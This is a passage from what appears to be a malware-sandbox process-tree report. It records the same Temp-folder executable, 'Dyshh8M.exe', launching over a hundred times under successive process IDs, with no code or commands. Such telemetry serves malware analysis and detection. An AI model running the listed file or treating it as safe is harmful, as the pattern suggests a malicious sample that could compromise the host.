        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7900
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7908
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7916
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7924
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7932
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7940
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7948
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7956
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7972
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7980
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7996
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8004
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8012
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8020
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8036
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8044
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8052
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8060
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8068
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8076
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8084
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8092
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2508
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8200
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8208
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8216
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8224
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8232
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8240
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8248
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8256
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8280
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8288
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8296
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8304
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8312
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8328
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8336
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8344
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8352
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8360
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8376
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8416
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8424
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8432
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8440
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8448
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8456
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8464
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8472
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8480
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8624
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8648
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8656
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8664
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8672
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8688
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8696
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8704
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8712
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8720
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8728
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8736
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8744
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8752
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8768
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8784
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8792
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8816
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8824
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8832
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8840
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8848
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8856
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8864
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8872
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8880
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8888
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8896
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8904
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8984
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9008
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9016
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9024
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9056
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9072
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9080
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9088
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9096
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9104
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9112
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9120
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9128
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
